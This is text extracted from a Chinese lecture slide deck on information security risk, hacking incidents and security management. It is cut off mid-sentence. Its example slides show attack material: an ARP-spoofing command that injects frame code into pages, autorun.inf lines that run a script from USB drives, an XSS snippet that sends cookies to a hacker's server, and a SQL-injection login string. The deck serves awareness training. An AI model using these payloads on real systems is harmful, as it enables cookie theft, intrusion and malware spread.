信息安全风险及分析.ppt

信息安全风险及分析,主讲：高显嵩 Email：,个人介绍 高显嵩,工作经历： 中国“互联网信息安全与政府监管”专家组成员 中国法证技术研究组成员 北京司法局电子数据鉴定协会理事 北京广播电视大学特聘专家 原微软公司的技术支持工程师 项目背景 劳动部全国民办中介机构信用等级评定系统 劳动部全国知识竞赛评分系统 劳动部七个功能平台合并方案 北京统计局的报表打印系统 北京电大一站式平台合并的规划及实施 为考研在线提供整体安全解决方安及实施 为国家电力部内部网络设计安全解决方安及实施 鞍山移动公司网络规划 长期负责北京市安全局国家安全部内部技术培训 负责华彬大厦的整个网络规划及实施 美国百麦公司北京分公司的整个网络规划及实施,主要内容,信息安全的重要性 信息安全问题分析 信息安全管理概述 信息安全风险管理 信息安全人员管理,信息安全重要性,当前我国网络信息安全的状况,网络及计算机病毒传播泛滥 垃圾邮件和病毒邮件泛滥 黑客攻击事件频繁 用户的个人隐私及计算机的使用权受到侵犯 网络犯罪事件频繁监管力度不够 涉及版权问题的事件增多 没有统一完善的适合国情的安全标准及法规 没有职责分明的管理部门或管理小组 制约与网络基础设施和技术环境 安全体系不健全 全民安全意识及计算机网络知识薄弱,CERT有关信息安全的统计,/stats/cert_stats.html,/stats/cert_stats.html,CERT有关信息安全的统计,CERT有关信息安全的统计,/stats/cert_stats.html,网络病毒传播泛滥,据2001年调查，我国约73%的计算机用户曾感染病毒，2003年上半年升至83%。其中，感染3次以上的用户高达59%，而且病毒的破坏性较大，被病毒破坏全部数据的占14%，破坏部分数据的占57%。 对病毒的预防和发现速度相对缓慢 垃圾邮件及病毒邮件泛滥,黑客离我们很近,1996年信息安全数据显示，世界上平均每秒就有一起黑客事件发生，无论是政府机构、军事部门，还是各大银行、大公司，只要与互联网接轨，就难逃黑客的“黑手”。 据美国网络安全公司Sophos发布的报告显示，在2008年第一季度，平均每5秒钟就会有一个网页成为黑客们的“盘中餐”。 中国网民每年被网络黑客“黑”掉76亿元。,FBI计算机犯罪调查报告,2002年503家机构中，有60%受到了攻击 2002年其中223家（占503家的44%）损失的总和达到$4.55848亿 2003年530家机构中有75%（398家）在年内受到了攻击 2003年251家（占530家的47%）的经济损失总和为$2.01799734 亿,全球信息安全损失数额：,中国已成为全球黑客的第三大来源地,有关统计数据显示，目前我国95%的与因特网相联的网络管理中心都遭到过国境内外黑客的攻击或侵入，受害涉及的覆盖面越来越大、程度越来越深。据国际互联网保安公司Symantec年的报告指出，中国甚至已经成为全球黑客的第三大来源地，竟然有6.9%的攻击国际互联网活动都是由中国发出的。然而面对这种局面，我国却缺乏像西方发达国家那样健全的防范措施。,2003年黑客事件,中韩新人王网上对抗 遭黑客入侵推迟10多分钟 中韩围棋新人王对抗赛在中国的新浪网和韩国网站落子，孔杰七段执白中盘战胜韩国的宋泰坤四段。赛前，由于有人以孔杰的名字入侵比赛的服务器，导致比赛推迟了多分钟才正常进行。,2003年黑客事件,百度连续遭遇严重黑客攻击 5月15日至5月18日，中文搜索网站百度遭到中国互联网有史以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍，自5月15日22:00起，百度的检索量突然大增，此番增长并未引起工程师注意。5月16日，攻击更加强烈，每秒钟攻击次数搞到达1000次，同一个词被查询次数最多达38863次。据互联网技术专家介绍，每秒钟攻击100次就已经属于非常严重的攻击，而每秒钟1000次的攻击就实属罕见,2003年黑客事件,263游戏论坛遭黑客攻击关闭,2004年黑客事件,腾讯服务器被攻击 10月17日早上10时许，国内各地网民陆续腾讯QQ无法登陆。据腾讯QQ内部技术人员透露，一国内团体，利用腾讯QQ服务器漏洞要挟腾讯支付100万美金作为“修复”费用，腾讯QQ不予理睬后，该组织于17日正式发动攻击，腾讯QQ服务器在1个小时内大面积出现故障,不得不全面终止进行抢修.本次行动组织严谨、操作迅速，业内有部分安全管理人士称网络进入软件绑架勒索时代。,2004年黑客事件,江民网站被攻击 2004年10月17日国内著名的杀毒软件厂商江民公司的网站被一 名为河马史诗的黑客攻破，页面内容被篡改。 攻击缘由：江民公司的最新杀毒软件产品KV2005的升级导致用户在上网时无法打开“邮件监控和网页监控”，用户在江民公司的官方论坛发反映后，江民没有做出及时的回复，也没能在短时间内解决用户的问题。,2005年黑客事件频繁,也许你的计算机正在被当作从事违法犯罪活动的工具，而当这些悄悄发生的时候，你却一无所知，因为你的电脑已经成为被别人控制的“僵尸电脑”。,2005年黑客事件,国内首起僵尸网络事件 今年27岁的徐立系唐山市某企业工人，其利用某些手段在互联网上传播其编写的特定程序，先后植入4万余台计算机，形成了中国首例BOTNET“僵尸网络。 2004年10月至2005年1月，徐立操纵“僵尸网络”对北京大吕黄钟电子商务有限公司所属音乐网站北京飞行网（简称酷乐），发动多次攻击，致使该公司蒙受重大经济损失，并导致北京电信数据中心某机房网络设备大面积瘫痪。,2006年黑客事件,2006年12月31日 中国工商银行被黑 06年的最后一天，很多网友都收到一些号称“工行要倒闭，所有存款均没收”之类的新闻链接，地址都是正牌的，而不是盗版的1。原来工商被黑客入侵，截止当天晚上11点，发现此漏洞已经修改好。,07年第一黑客事件,深圳律师网被黑 当进入该网站之后，就发生事故了，发现，已经被黑. 主要有以下字样： 天空未留痕迹,鸟儿却已飞过. 网络亦是虚拟,疯狂亦是叛逆. .尊敬的網站管理員 您好. 台湾是中国的，日本是吃S的 .如果你是中国人. .请保留此页几天 谢谢!. 少年浪子 所向披靡 OICQ 11888956,例子：得到本地登录密码,Pulist.exe+findpass.exe PasswordReminder.exe,例子：记录本地登录密码,GINA PassWord Sniffer,例子得到远程计算机的密码,IpcScan2.0,例子：更改本地管理员密码,WindowsNT/2000/XP/2003/Linux/Unix系统，本地接触可以更改任意用户的密码。 一张软盘更改本地管理员密码 Ntpassword 一张光盘更改本地管理员密码 ERD Commander 2003,例子：ERD Commander,例子： ERD Commander,例子：得到他人的邮件密码,密码监听器2.8,通过监听得到密码,通过监听得到密码,通过监听得到密码,例子：内网渗透 zxarps.exe,内网主机访问任意站点被入侵 指定的IP段中的用户访问的所有网站都插入一个框架代码 zxarps.exe -idx 0 -ip -9 -port 80 -insert “,ARP协议工作原理,ARP欺骗交换机,ARP欺骗计算机,例子：内网U盘感染,U盘在互联网和局域网内交叉使用文件被盗取 Autorun.inf autorun风暴 autorun open= shellopen=打开(&O) shellopenCommand=WScript.exe .autorun.vbs shellopenDefault=1 shellexplore=资源管理器(&X) shellexploreCommand=WScript.exe .autorun.vbs,例子：查看网络内任何人的上网记录,anyweb2.54 可以记录同一局域网内任何计算机上浏览的网页内容，察看的邮箱内容，登陆的ftp的内容。用Outlook或者Outlook Express接受的全部邮件都回同时被该软件接收。,例子：查看MSN密码,例子：察看星号密码,例子：读取缓存密码,例子：控制他人计算机,Dameware 4.5 Remote Administrator2.1 是一种网络管理软件，但是经常被黑客利用来远程控制和管理，被入侵者的计算机。,例子：打开对方摄像头和语音,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,SQL Injection 针对网站的攻击,XSS 跨站脚本,构建了个 Javascript 脚本传递客户端的 cookie 到黑客的服务器 Javascript 脚本可以简单的这样写 var img = new Image(); img.src = get_cookie.php?var= + encodeURI(document.cookie); 然后服务器端使用 PHP 简单写了个脚本保存 Cookie 数据 ,构造SQL登陆语句,用户名: admin 密码: 1 or 1=1,其他例子,击键记录 Office文档挂栽木马 网页木马 木马捆绑,信息安全管理概述,例一： 局域网内病毒泛滥成灾。 例二： 网络中为什么会有ARP欺骗的问题发生 例三： 局域网内计算机故障频繁发生 例四： 为什么要给每个用户管理员权限,先来分析两个例子,信息安全的成败取决于两个因素：技术和管理。 技术是信息安全的构筑材料，管理是真正的粘合剂和催化剂。 人们常说，三分技术，七分管理，可见管理对信息安全的重要性。 信息安全管理（Information Security Management）作为组织完整的管理体系中一个重要的环节，它构成了信息安全具有能动性的部分，是指导和控制组织的关于信息安全风险的相互协调的活动，其针对对象就是组织的信息资产。 现实世界里大多数安全事件的发生和安全隐患的存在，与其说是技术上的原因，不如说是管理不善造成的，理解并重视管理对于信息安全的关键作用，对于真正实现信息安全目标来说尤其重要。,什么是信息安全管理？,信息安全管理模型,信息安全必须从整体考虑，必须做到“有计划有目标、发现问题、分析问题、采取措施解决问题、后续监督避免再现”这样全程管理的思路，这就要求建立的是一套完整的信息安全管理体系，这样的系统工程，只有处于组织最高管理者领导和支持之下，才可能成功 最高管理层通过明确信息安全目标和方针为信息安全活动指引方向 最高管理层能够为信息安全活动提供必要的资源支持 最高管理层能够在重大问题上做出决策 最高管理层可以协调组织不同单位不同环节的关系，提升促动力 说到底，最高管理者是组织信息安全的最终责任人,组织高管全面负责信息安全管理,制定有效的安全管理计划，可以确保信息安全策略得到恰当执行 进行有效安全管理的途径，应该是自上而下的（Top-Down）： 最高管理层负责启动并定义组织的安全方针 管理中层负责将安全策略充实成标准、基线、指南和程序，并监督执行 业务经理或安全专家负责实施安全管理文件中的指定配置 最终用户负责遵守组织所有的安全策略 安全管理计划小组应该开发三类计划： 战略计划（strategic plan）是长期计划（例如5年），相对稳定，定义了组织的目标和使命 战术计划（tactical plan）是中期计划（例如1年），是对实现战略计划中既定目标的任务和进度的细节描述，例如雇用计划、预算计划、维护计划、系统开发计划等 操作计划（operational plan）是短期的高度细化的计划，须经常更新（每月或每季度），例如培训计划、系统部署计划、产品设计计划等,按计划行事,数据收集者（Data Collector）对数据主体（Data Subject）：准确（Accuracy）、隐私（Privacy）； 数据保管者（Data Custodian）对数据拥有者（Data Owner）：可用性（Availability）、完整性（Integrity）、保密性（Confidentiality）； 数据用户（Data Users）对拥有者/主体（Owner/Subject）：保密性（Confidentiality）和完整性； 系统用户（System Users）对系统拥有者（System Owner）：可用性（Availability）和软件完整性（Software Integrity）； 系统管理者（System Manager）对用户（Users），可用性（Integrity）、完整性（Integrity）； 用户（Users）对其它用户（Other Users）：可用性（Availability）。,重要角色和职责,信息安全管风险管理,风险,风险管理（Risk Management）就是识别风险、评估风险、采取措施将风险减少到可接受水平，并维持这个风险水平的过程。风险管理是信息安全管理的核心内容。,在信息安全领域，风险（Risk）就是指信息资产遭受损坏并给企业带来负面影响的潜在可能性。,风险管理,风险管理概述,资产（Asset） 对组织具有价值的信息资产，包括计算机硬件、通信设施、数据库、文档信息、软件、信息服务和人员等，所有这些资产都需要妥善保护。 威胁（Threat） 可能对资产或组织造成损害的某种安全事件发生的潜在原因，需要识别出威胁源（Threat source）或威胁代理（Threat agent）。 弱点（Vulnerability） 也被称作漏洞或脆弱性，即资产或资产组中存在的可被威胁利用的缺点，弱点一旦被利用，就可能对资产造成损害。 风险（Risk） 特定威胁利用资产弱点给资产或资产组带来损害的潜在可能性。 可能性（Likelihood） 对威胁发生几率（Probability）或频率（Frequency）的定性描述。 影响（Impact） 后果（Consequence），意外事件发生给组织带来的直接或间接的损失或伤害。 安全措施（Safeguard） 控制（control）或对策（countermeasure），即通过防范威胁、减少弱点、限制意外事件带来影响等途径来消减风险的机制、方法和措施。 残留风险（Residual Risk） 在实施安全措施之后仍然存在的风险。,风险管理相关要素,风险管理的目标,关键是达成成本利益的平衡,风险管理的一般过程,风险评估（Risk Assessment）是对信息资产及其价值、面临的威胁、存在的弱点，以及三者综合作用而带来风险的大小或水平的评估。 作为风险管理的基础，风险评估是组织确定信息安全需求的一个重要途径，属于组织信息安全管理体系策划的过程。主要任务包括： 识别构成风险的各种因素 评估风险发生的可能性和造成的影响，并最终评价风险水平或大小 确定组织承受风险的能力 确定风险消减和控制的策略、目标和优先顺序 推荐风险消减对策以供实施 包括风险分析（Risk Analysis）和风险评价（Risk Evaluation）两部分，但一般来说，风险评估和风险分析同义。,什么是风险评估？,降低风险（Reduce Risk） 实施有效控制，将风险降低到可接受的程度，实际上就是力图减小威胁发生的可能性和带来的影响，包括： 减少威胁：例如，实施恶意软件控制程序，减少信息系统受恶意软件攻击的机会 减少弱点：例如，通过安全意识培训，强化职员的安全意识与安全操作能力 降低影响：例如，制定灾难恢复计划和业务连续性计划，做好备份 规避风险（Avoid Risk） 或者Rejecting Risk。有时候，组织可以选择放弃某些可能引来风险的业务或资产，以此规避风险。例如，将重要的计算机系统与互联网隔离，使其免遭来自外部网络的攻击。 转嫁风险（Transfer Risk） 也称作Risk Assignment。将风险全部或者部分地转移到其他责任方，例如购买商业保险。 接受风险（Accept Risk） 在实施了其他风险应对措施之后，对于残留的风险，组织可以选择接受。,确定风险消减策略,绝对安全（即零风险）是不可能的。 实施安全控制后会有残留风险或残存风险（Residual Risk）。 为了实现信息安全，应该确保残留风险在可接受的范围内： 残留风险Rr 原有风险R0 控制效力R 残留风险Rr 可接受的风险Rt 对残留风险进行确认和评价的过程其实就是风险接受的过程。决策者可以根据风险评估的结果来确定一个阀值，以该阀值作为是否接受残留风险的标准。,评价残留风险,信息安全人员管理,人是信息安全的关键因素，人员管理不善会给组织带来非常大的安全威胁和风险。 有调查显示，大多数重大信息安全事件通常都来自组织内部，例如，员工受利益驱使将公司技术图纸出卖给竞争对手，利用内部系统从事经济犯罪活动，或者由于缺乏安全意识或操作技能而导致误操作，引起信息系统故障等。 为降低内部员工所带来的人为差错、盗窃、欺诈及滥用设施的风险，并且避免引发法律风险，组织应该采取措施，加强内部人员的安全管理： 对工作申请者实施背景检查 签署雇用合同和保密协议 加强在职人员的安全管理 严格控制人员离职程序,必须高度重视人员安全问题,背景检查是工作申请过程的一个部分，组织至少会审查申请人简历中的基本信息。对于敏感职位，可能还会考虑进一步的调查。调查过程中，组织可以请求访问申请人的信用和犯罪记录，甚至可以聘请外部公司对申请人进行调查，以确定是否存在潜在问题或利益冲突。 通过背景检查，可以防止： 因为人员解雇而导致法律诉讼 因为雇用疏忽而导致第三方的法律诉讼 雇用不合格的人员 丧失商业秘密 员工从一般岗位转入信息安全重要岗位，组织也应当对其进行检查，对于处在有相当权力位置的人员，这种检查应定期进行。,背景检查（Background Check）,组织应与所有员工签订保密协议，作为雇用合同基本条款的一部分 保密协议应明确规定雇员对组织信息安全的责任、保密要求及违约的法律责任 签订保密承诺旨在加强员工对组织信息安全应承担的责任，协议上应有员工的签名并由其保存一份协议副本 对于处于试用期的新员工，要求其签订一份保密承诺 在允许第三方用户使用信息处理设施之前，要求其签订保密协议 当雇用期或合同期有更改，特别是雇员到期离职或合同终止时，应重申保密协议,保密协议（ Confidentiality Agreement ）,职务分离（Separation of Duties），将一个关键任务分成多个不同的部分，每个部分由不同的人执行。 共谋（Collusion），进行欺诈（Fraud）需要多个人共